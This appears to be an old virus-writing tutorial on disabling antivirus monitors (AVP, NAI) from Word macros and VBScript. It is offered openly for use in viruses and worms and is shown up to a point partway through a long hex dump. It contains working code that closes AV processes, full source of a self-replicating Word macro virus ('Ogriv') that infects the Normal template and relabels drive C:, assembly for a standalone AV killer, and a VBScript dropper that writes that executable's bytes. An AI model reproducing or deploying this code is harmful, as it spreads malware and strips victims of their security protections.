<html>

<head>
<title>Killing AV Monitors under VB</title>
</head>

<body bgcolor="#000000" text="#00CCFF" link="#00CCFF" vlink="#00CCFF" alink="#00CCFF">

<p> <font face="Times New Roman"> =========================================<br>
 Killing AV Monitors under VB<br>
 -----------------------------------------<br>
 By LiteSYS/XAKER - &lt;liteno2@softhome.net><br>
 =========================================<br>
<br>
 After taking a look at Benny/29A's "How to k!ll some AV Monitors", which<br>
 explained how to unload AV monitors under Asm... I thought if this<br>
 wonderful retro technique could be done under VB and used under macro<br>
 viruses and WSH stuff so I decided to take a look at the VBA object<br>
 explorer...<br>
<br>
 The key is the "Tasks" object... it gives you lots of functions to work<br>
 with the currently running processes under Windows. Let's take a look at<br>
 this little code, which will show some boxes with every windows' name.<br>
<br>
--------------------------------<br>
Sub gandola()<br>
On Error Resume Next<br>
<br>
For I = 1 to Tasks.Count<br>
MsgBox Tasks.Item(I).Name<br>
Next<br>
<br>
End Sub<br>
--------------------------------<br>
<br>
 If you take a look at the stuff under .Item(I) you will see some event<br>
 called "Close", that's the one we are going to use... what it does is<br>
 send the "WM_QUIT" message to the process and it will go down.<br>
<br>
 Do you catch the idea? the only thing you need to know to deactivate some<br>
 monitors is the monitor's window name, this can be something like<br>
 "AVP Monitor" (AVP) or "NAI_VS_STAT" (NAI) and such things alike, so<br>
 if you want to get those names you should load your AV monitor and use the<br>
 first exposed code (Sub gandola).<br>
<br>
 When you are going to unload your AV you must use the Name property<br>
 and some stuff, just take a look at this example, which unloads AVP.<br>
<br>
--------------------------------<br>
Sub nohaybillete()<br>
On Error Resume Next<br>
<br>
For I = 1 to Tasks.Count<br>
If ( Tasks.Item(I).Name = "AVP Monitor" ) Then Tasks.Item(I).Close<br>
Next<br>
<br>
End Sub<br>
--------------------------------<br>
<br>
 An you're done, no more AVP and you are totally free...<br>
<br>
 Something that you must be aware of, don't forget to put an<br>
 "On Error Resume Next" statement or VBA will tell you there's an<br>
 error on such "Task" that doesn't exist...<br>
<br>
 I wrote a sample virus called Ogriv (Virgo spelled backwards =P),<br>
 nothing special, just an example, it kills both AVP and NAI. I<br>
 sincerely don't know if this is the first virus capable of doing<br>
 this, but if you, dear reader, know it, please inform me =).<br>
<br>
 I hope this code helps you...<br>
<br>
--------------------------------<br>
'Ogriv<br>
'By LiteSYS/XAKER<br>
Sub Document_Open()<br>
On Error Resume Next<br>
With VBE.ActiveVBProject: Set Gele = .VBComponents(1).CodeModule: End With<br>
With ActiveDocument.VBProject: Set ADO = .VBComponents(1).CodeModule: End With<br>
With NormalTemplate.VBProject: Set NTO = .VBComponents(1).CodeModule: End With<br>
With Tasks<br>
For I = 1 To .Count<br>
If (.Item(I).Name = "AVP Monitor") Or (.Item(I).Name = "NAI_VS_STAT") Then .Item(I).Close<br>
Next<br>
End With<br>
Evo = Gele.Lines(1, Gele.CountOfLines)<br>
If (ADO.Lines(1, 1) &lt;> "'Ogriv") Then ADO.AddFromString Evo<br>
If (NTO.Lines(1, 1) &lt;> "'Ogriv") Then NTO.AddFromString Evo<br>
If (Day(Now) = 26) Then Pix = Shell("LABEL C: OGRIV!!!", vbHide)<br>
End Sub<br>
--------------------------------<br>
<br>
 Recently, I was trying to do it under VBScript and there is no such<br>
 Tasks object under VBS, but you can create an object pointing to<br>
 Word.Application and the code is the same, but this will only work<br>
 in systems with Word installed, that's the problem.<br>
<br>
 As i said, you need to create an object pointing to Word.Application.<br>
 Here is the first code you saw but works on VBScript.<br>
<br>
--------------------------------<br>
On Error Resume Next<br>
Set Guord = CreateObject("Word.Application")<br>
With Guord<br>
<br>
For I = 1 to .Tasks.Count<br>
MsgBox .Tasks.Item(I).Name<br>
Next<br>
<br>
.Quit<br>
End With<br>
--------------------------------<br>
<br>
 And the second code you saw...<br>
<br>
--------------------------------<br>
On Error Resume Next<br>
Set Guord = CreateObject("Word.Application")<br>
With Guord<br>
For I = 1 to .Tasks.Count<br>
If (.Tasks.Item(I).Name = "AVP Monitor") Or (.Tasks.Item(I).Name = "NAI_VS_STAT" ) Then .Tasks.Item(I).Close<br>
Next<br>
.Quit<br>
End With<br>
--------------------------------<br>
<br>
 There's another method... what about dropping a simple executable<br>
 (written in assembly ofcoz) that can use directly the FindWindowA<br>
 and PostMessageA APIs? fully compatible with every windoze version<br>
 and you don't have to relay in that untrustable Word object...<br>
<br>
 I must thank Benny/29A for his AV monitor deactivation tute that<br>
 appeared in 29A #4, because it was my inspiration to do this...<br>
<br>
 Ok, you must use your Debug script or your Chr stuff to write to<br>
 the file. Look at the assembly code first, it kills both AVP<br>
 and NAI:<br>
<br>
--------------------------------<br>
.386<br>
.MODEL FLAT, STDCALL<br>
LOCALS<br>
JUMPS<br>
<br>
EXTRN ExitProcess:PROC<br>
EXTRN FindWindowA:PROC<br>
EXTRN PostMessageA:PROC<br>
<br>
.DATA<br>
 DD ?<br>
.CODE<br>
<br>
RETRO:<br>
      MOV EAX, OFFSET Titulo_NAI<br>
      CALL MATA_MONI<br>
<br>
      MOV EAX, OFFSET Titulo_AVP<br>
      CALL MATA_MONI<br>
<br>
<br>
      PUSH 0<br>
      CALL ExitProcess<br>
<br>
      Titulo_AVP     db "AVP Monitor", 00h<br>
      Titulo_NAI     db "NAI_VS_STAT", 00h<br>
<br>
      MATA_MONI PROC NEAR<br>
<br>
        PUSH EAX<br>
        PUSH 0<br>
        CALL FindWindowA<br>
        JNZ SI_MATARAS<br>
<br>
        RET<br>
<br>
        SI_MATARAS:<br>
          PUSH 0<br>
          PUSH 0<br>
          PUSH 12h<br>
          PUSH EAX<br>
          CALL PostMessageA<br>
<br>
        RET<br>
      MATA_MONI ENDP<br>
<br>
END RETRO<br>
--------------------------------<br>
<br>
 Assemble, Link it and create your script or your Chrs... i<br>
 don't like the debug script idea because it's too slooooow so<br>
 i prefer  put it on your<br>
 virus/worm and you're all set, look at this example:<br>
<br>
--------------------------------<br>
Set fso = CreateObject("Scripting.FileSystemObject")<br>
Set fil = fso.CreateTextFile ("retro.scr", True)<br>
Set WSS  = CreateObject("Wscript.Shell")<br>
<br>
Fil.WriteLine("n RETRO.DAT")<br>
Fil.WriteLine("")<br>
Fil.WriteLine("e 100 4D 5A 50 0 2 0 0 0 4 0 F 0 FF FF 0 0 ")<br>
Fil.WriteLine("e 110 B8 0 0 0 0 0 0 0 40 0 1A 0 0 0 0 0 ")<br>
Fil.WriteLine("e 120 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 130 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 ")<br>
Fil.WriteLine("e 140 BA 10 0 E 1F B4 9 CD 21 B8 1 4C CD 21 90 90 ")<br>
Fil.WriteLine("e 150 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 ")<br>
Fil.WriteLine("e 160 74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57 ")<br>
Fil.WriteLine("e 170 69 6E 33 32 D A 24 37 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 180 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 190 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 1A0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 1B0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 1C0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 1D0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 1E0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 1F0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 200 50 45 0 0 4C 1 4 0 94 2A 11 2D 0 0 0 0 ")<br>
Fil.WriteLine("e 210 0 0 0 0 E0 0 8E 81 B 1 2 19 0 2 0 0 ")<br>
Fil.WriteLine("e 220 0 4 0 0 0 0 0 0 0 10 0 0 0 10 0 0 ")<br>
Fil.WriteLine("e 230 0 20 0 0 0 0 40 0 0 10 0 0 0 2 0 0 ")<br>
Fil.WriteLine("e 240 1 0 0 0 0 0 0 0 3 0 A 0 0 0 0 0 ")<br>
Fil.WriteLine("e 250 0 50 0 0 0 4 0 0 0 0 0 0 2 0 0 0 ")<br>
Fil.WriteLine("e 260 0 0 10 0 0 20 0 0 0 0 10 0 0 10 0 0 ")<br>
Fil.WriteLine("e 270 0 0 0 0 10 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 280 0 30 0 0 A8 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 290 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 2A0 0 40 0 0 14 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 2B0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 2C0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 2D0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 2E0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 2F0 0 0 0 0 0 0 0 0 43 4F 44 45 0 0 0 0 ")<br>
Fil.WriteLine("e 300 0 10 0 0 0 10 0 0 0 2 0 0 0 6 0 0 ")<br>
Fil.WriteLine("e 310 0 0 0 0 0 0 0 0 0 0 0 0 20 0 0 E0 ")<br>
Fil.WriteLine("e 320 44 41 54 41 0 0 0 0 0 10 0 0 0 20 0 0 ")<br>
Fil.WriteLine("e 330 0 0 0 0 0 8 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 340 0 0 0 0 40 0 0 C0 2E 69 64 61 74 61 0 0 ")<br>
Fil.WriteLine("e 350 0 10 0 0 0 30 0 0 0 2 0 0 0 8 0 0 ")<br>
Fil.WriteLine("e 360 0 0 0 0 0 0 0 0 0 0 0 0 40 0 0 C0 ")<br>
Fil.WriteLine("e 370 2E 72 65 6C 6F 63 0 0 0 10 0 0 0 40 0 0 ")<br>
Fil.WriteLine("e 380 0 2 0 0 0 A 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 390 0 0 0 0 40 0 0 50 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 3A0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 3B0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 3C0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 3D0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 3E0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 3F0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 400 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 410 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 420 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 430 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 440 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 450 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 460 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 470 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 480 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 490 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 4A0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 4B0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 4C0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 4D0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 4E0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 4F0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 500 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 510 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 520 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 530 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 540 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 550 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 560 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 570 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 580 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 590 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 5A0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 5B0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 5C0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 5D0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 5E0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 5F0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 600 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 610 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 620 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 630 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 640 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 650 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 660 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 670 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 680 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 690 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 6A0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 6B0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 6C0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 6D0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 6E0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 6F0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 700 B8 27 10 40 0 E8 29 0 0 0 B8 1B 10 40 0 E8 ")<br>
Fil.WriteLine("e 710 1F 0 0 0 6A 0 E8 30 0 0 0 41 56 50 20 4D ")<br>
Fil.WriteLine("e 720 6F 6E 69 74 6F 72 0 4E 41 49 5F 56 53 5F 53 54 ")<br>
Fil.WriteLine("e 730 41 54 0 50 6A 0 E8 1C 0 0 0 75 1 C3 6A 0 ")<br>
Fil.WriteLine("e 740 6A 0 6A 12 50 E8 7 0 0 0 C3 FF 25 50 30 40 ")<br>
Fil.WriteLine("e 750 0 FF 25 58 30 40 0 FF 25 5C 30 40 0 0 0 0 ")<br>
Fil.WriteLine("e 760 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 770 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 780 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 790 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 7A0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 7B0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 7C0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 7D0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 7E0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 7F0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 800 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 810 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 820 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 830 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 840 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 850 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 860 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 870 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 880 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 890 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 8A0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 8B0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 8C0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 8D0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 8E0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 8F0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 900 3C 30 0 0 0 0 0 0 0 0 0 0 64 30 0 0 ")<br>
Fil.WriteLine("e 910 50 30 0 0 44 30 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 920 71 30 0 0 58 30 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 930 0 0 0 0 0 0 0 0 0 0 0 0 7C 30 0 0 ")<br>
Fil.WriteLine("e 940 0 0 0 0 8A 30 0 0 9A 30 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 950 7C 30 0 0 0 0 0 0 8A 30 0 0 9A 30 0 0 ")<br>
Fil.WriteLine("e 960 0 0 0 0 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C ")<br>
Fil.WriteLine("e 970 0 55 53 45 52 33 32 2E 64 6C 6C 0 0 0 45 78 ")<br>
Fil.WriteLine("e 980 69 74 50 72 6F 63 65 73 73 0 0 0 50 6F 73 74 ")<br>
Fil.WriteLine("e 990 4D 65 73 73 61 67 65 41 0 0 0 0 46 69 6E 64 ")<br>
Fil.WriteLine("e 9A0 57 69 6E 64 6F 77 41 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 9B0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 9C0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 9D0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 9E0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 9F0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e A00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e A10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e A20 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e A30 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e A40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e A50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e A60 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e A70 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e A80 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e A90 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e AA0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e AB0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e AC0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e AD0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e AE0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e AF0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e B00 0 10 0 0 14 0 0 0 1 30 B 30 4D 30 53 30 ")<br>
Fil.WriteLine("e B10 59 30 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e B20 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e B30 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e B40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e B50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e B60 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e B70 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e B80 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e B90 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e BA0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e BB0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e BC0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e BD0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e BE0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e BF0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e C00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e C10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e C20 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e C30 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e C40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e C50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e C60 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e C70 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e C80 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e C90 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e CA0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e CB0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e CC0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e CD0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e CE0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e CF0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e D00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e D10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e D20 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e D30 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e D40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e D50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e D60 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e D70 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e D80 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e D90 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e DA0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e DB0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e DC0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e DD0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e DE0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e DF0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e E00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e E10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e E20 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e E30 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e E40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e E50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e E60 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e E70 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e E80 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e E90 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e EA0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e EB0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e EC0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e ED0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e EE0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e EF0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
